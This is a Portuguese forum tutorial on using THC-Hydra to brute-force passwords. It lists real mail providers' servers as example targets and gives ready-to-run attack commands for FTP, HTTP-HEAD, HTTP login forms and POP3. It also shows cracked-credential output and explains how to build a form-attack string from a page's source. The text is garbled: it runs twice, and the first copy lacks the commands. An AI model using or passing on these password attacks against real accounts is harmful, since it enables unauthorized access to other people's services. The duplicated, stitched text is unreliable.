vamos lah
O THC-Hydra usa um mecanismo de força bruta para quebrar senhas.
FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de senhas e nomes de usuários ate chegar ao seu objetivo obvio.
O programa pode ser adquirido gratuitamente no site oficial do projeto : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[0x00] Rodando o THC-Hydra no (Windows XP):
O primeiro passo é fazer o download da versão Win32/Cywin do programa no site oficial,descompactar e rodar.
Crie uma variável de ambiente indo em painel de controle>sistema, aba avançado,variáveis de ambiente e adicionando o caminho na variável path.
ex: C:\hydra-5.4-win;
não esqueça de adicionar ; ponto virgula no final do caminho,assim o windows vai conseguir diferenciar o caminho do hydra dos demais adicionados.
[0x01]
Rode o comando hydra no prompt de comandos para chamar o programa thc-hydra.
Podemos ver na imagem acima que quando executado exibe informações como versão,sintaxe de uso e as opções seguidas de comentários.
-R Restaura sessões abordadas/quebradas.
-S Estabelece conexões seguras usando SSL.
-s Identifica qual porta o hydra vai estabelecer a conexão.
Uso: -s 110.
-l Especifica o nome da vitima. uso: -l fulano.
-L Carrega uma lista contendo nomes de vitimas.
uso: -L users.txt
-p Usa senha única. uso: -s 123456
-P Carrega uma lista de senhas. uso: -S senhas.txt
-e Usado junto com 's' testa se o usuário usa seu user como senha//acompanhado da letra 'n' testa uma senha em branco.
-C Usado para carregar um arquivo contendo usuário/senha. formato fulano:123456, seria o mesmo que -L/-P . uso: -C user-pass.txt
-M Carrega uma lista de servidores. uso: -M server.txt
-o Salvar os resultados obtidos dentro de um arquivo.Uso: -o saida.txt
-f Faz o programa parar de trabalhar quando a senha é encontrada.
-t Limita uma certa quantidade de solicitações por vez,assim evita do programa se engasgar com demasiadas solicitacões.
-w Usado para definir o tempo máximo em segundos para esperar resposta do servidor.
-v / V Chama o modo verbose do programa.
A adicional 'V' é usada para mostrar todas as tentativas. Uso: -vV /ou 'v' para o modo verbose sem exibir as tentativas mau sucedidas.
Server: Servidor.
exemplos>>
.127.0.0.1
.localhost
.pop.gmail.com
.pop.mail.yahoo.com.br
.pop3.live.com
.ftp.lol.com.br
Service: protocolo||serviço que sera usado||chamado.
exemplos>>
.pop3
.ftp
.smtp
.vnc
.imap
.http-head
.http-post-form
CALMA, o tutorial ja ta acabando
Agora tem alguns exemplos:
Retorno:
Vamos em partes e explicaremos as informações de saída que o hydra retornou.
Retorno:
O Hydra encontrou usuario:root/senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'
Dentro do arquivo foi escrito as seguintes linhas pelo programa:
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1 login: root password: Est2yu
/xammp/ é o caminho/path >> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Retorno:
>> Para criar esta sintaxe tive que olhar o código da pagina.
De cara sei como sera feito o envio >>
index.php?nome=meunome&senha=minhasenha&boo=Enviar
–- usando o 'method=post' para envio –-
no meu caso quando envio senha errada,no título da pagina 'index.php' aparece a mensagem invalido.
sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
Retorno:
FIM \o/
Creditos: Mdh3ll & H4ck3r.5m0g
Nos desculpem pelos errinhos de portugues :s
OBS: Se você nao entendeu algum processo, revise a parte de executar e de Opções desse tutorial
Caso ainda assim nao tenha entendido, me add no msn que eu explico direitinho
godinho.feliz@hotmail.com
O THC-Hydra usa um mecanismo de força bruta para quebrar senhas.
FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de senhas e nomes de usuários ate chegar ao seu objetivo obvio.
O programa pode ser adquirido gratuitamente no site oficial do projeto : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[0x00] Rodando o THC-Hydra no (Windows XP):
O primeiro passo é fazer o download da versão Win32/Cywin do programa no site oficial,descompactar e rodar.
Crie uma variável de ambiente indo em painel de controle>sistema, aba avançado,variáveis de ambiente e adicionando o caminho na variável path.
ex: C:\hydra-5.4-win;
não esqueça de adicionar ; ponto virgula no final do caminho,assim o windows vai conseguir diferenciar o caminho do hydra dos demais adicionados.
[0x01]
Executando o Hydra:
Rode o comando hydra no prompt de comandos para chamar o programa thc-hydra.
Podemos ver na imagem acima que quando executado exibe informações como versão,sintaxe de uso e as opções seguidas de comentários.
[0x02] Opções:
-R Restaura sessões abordadas/quebradas.
-S Estabelece conexões seguras usando SSL.
-s Identifica qual porta o hydra vai estabelecer a conexão.
Uso: -s 110.
-l Especifica o nome da vitima. uso: -l fulano.
-L Carrega uma lista contendo nomes de vitimas.
uso: -L users.txt
-p Usa senha única. uso: -s 123456
-P Carrega uma lista de senhas. uso: -S senhas.txt
-e Usado junto com 's' testa se o usuário usa seu user como senha//acompanhado da letra 'n' testa uma senha em branco.
-C Usado para carregar um arquivo contendo usuário/senha. formato fulano:123456, seria o mesmo que -L/-P . uso: -C user-pass.txt
-M Carrega uma lista de servidores. uso: -M server.txt
-o Salvar os resultados obtidos dentro de um arquivo.Uso: -o saida.txt
-f Faz o programa parar de trabalhar quando a senha é encontrada.
-t Limita uma certa quantidade de solicitações por vez,assim evita do programa se engasgar com demasiadas solicitacões.
-w Usado para definir o tempo máximo em segundos para esperar resposta do servidor.
-v / V Chama o modo verbose do programa.
A adicional 'V' é usada para mostrar todas as tentativas. Uso: -vV /ou 'v' para o modo verbose sem exibir as tentativas mau sucedidas.
Server: Servidor.
exemplos>>
.127.0.0.1
.localhost
.pop.gmail.com
.pop.mail.yahoo.com.br
.pop3.live.com
.ftp.lol.com.br
Service: protocolo||serviço que sera usado||chamado.
exemplos>>
.pop3
.ftp
.smtp
.vnc
.imap
.http-head
.http-post-form
CALMA, o tutorial ja ta acabando
Agora tem alguns exemplos:
Exemplo 1 FTP
hydra -l root -P pass.txt -s 21 localhost ftp
Vamos em partes e explicaremos as informações de saída que o hydra retornou.
16 tasks, > É o numero de solicitacões que o Hydra esta fazendo ao nosso alvo. Estas 16 solicitações por vez é 'PADRÃO/DEFALT' do Hydra e pode ser mudado usando a opção -t [n-solicitações]
1 servers, > Estarei fazendo solicitacões para a obtenção das senhas em um único servidor.
23 login tries (l:1/p:23), ~1 tries per task, > Esta saída esta mostrando a quantidade de senhas que estão inseridas no aquivo pass.txt.
[DATA] attacking service ftp on port 21 > Indica que o ataque já foi iniciado em um serviço FTP na porta 21.
[21][ftp] host: 127.0.0.1 login: root password: chaw123 > Esta saída mostra que foi encontrado a senha chaw123 pertencente ao usuário root.
[STATUS] attack finished for localhost (waiting for childs to finish) > Esta mensagem indica que o ataque foi finalizado.
1 servers, > Estarei fazendo solicitacões para a obtenção das senhas em um único servidor.
23 login tries (l:1/p:23), ~1 tries per task, > Esta saída esta mostrando a quantidade de senhas que estão inseridas no aquivo pass.txt.
[DATA] attacking service ftp on port 21 > Indica que o ataque já foi iniciado em um serviço FTP na porta 21.
[21][ftp] host: 127.0.0.1 login: root password: chaw123 > Esta saída mostra que foi encontrado a senha chaw123 pertencente ao usuário root.
[STATUS] attack finished for localhost (waiting for childs to finish) > Esta mensagem indica que o ataque foi finalizado.
Exemplo 2 http-head
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
O Hydra encontrou usuario:root/senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'
Dentro do arquivo foi escrito as seguintes linhas pelo programa:
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1 login: root password: Est2yu
/xammp/ é o caminho/path >> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Exemplo 3 http-post-form
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalid o</title>"
>> Para criar esta sintaxe tive que olhar o código da pagina.
<form action="index.php" method="POST">
<input type="text" name="nome" /><BR><br>
<input type="password" name="senha" /><br><br>
<input type="submit" name="boo" value="Enviar">
<br>
</form>
<input type="text" name="nome" /><BR><br>
<input type="password" name="senha" /><br><br>
<input type="submit" name="boo" value="Enviar">
<br>
</form>
index.php?nome=meunome&senha=minhasenha&boo=Enviar
–- usando o 'method=post' para envio –-
no meu caso quando envio senha errada,no título da pagina 'index.php' aparece a mensagem invalido.
invalido
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalid o</title>"
Exemplo 4 POP3
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
FIM \o/
Creditos: Mdh3ll & H4ck3r.5m0g
Nos desculpem pelos errinhos de portugues :s
OBS: Se você nao entendeu algum processo, revise a parte de executar e de Opções desse tutorial
Caso ainda assim nao tenha entendido, me add no msn que eu explico direitinho
godinho.feliz@hotmail.com
Comment